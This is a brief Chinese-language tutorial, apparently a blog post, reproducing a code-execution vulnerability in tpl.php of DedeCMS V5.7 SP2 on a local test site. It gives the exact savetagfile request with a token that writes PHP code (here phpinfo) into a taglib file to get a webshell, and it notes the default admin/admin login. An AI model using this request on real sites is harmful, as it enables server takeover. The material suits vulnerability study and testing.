环境搭建
DeDeCMS官网:http://www.dedecms.com
网站源码版本:DedeCMS V5.7 SP2正式版
程序源码下载:http://www.dedecms.com/products/dedecms/downloads/
默认后台地址:http://127.0.0.1/dede
默认账号密码:admin admin
演示
本地搭建织梦站点
域名后面加上个/dede访问后台,
默认帐号密码admin登录
http://localhost:8080/DedeCMS/uploads/dede/
DedeCMS V5.7 SP2版本中tpl.php存在代码执行,利用这个漏洞在增加新的标签中上传木马 获取Webshell
我们先获取token,访问/dede/tpl.php?action=upload
在该页面中查看源代码获取到token值
访问
http://localhost:8080/DedeCMS/uploads/dede/tpl.php?filename=secquan.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=55ab8c3e67797476fac5a53259f700b6【URL地址+token值自行更换】
然后访问 /include/taglib/secquan.lib.php
读取得到phpinfo
http://localhost:8080/DedeCMS/uploads/include/taglib/secquan.lib.php
1 条评论
查看源代码里面没有token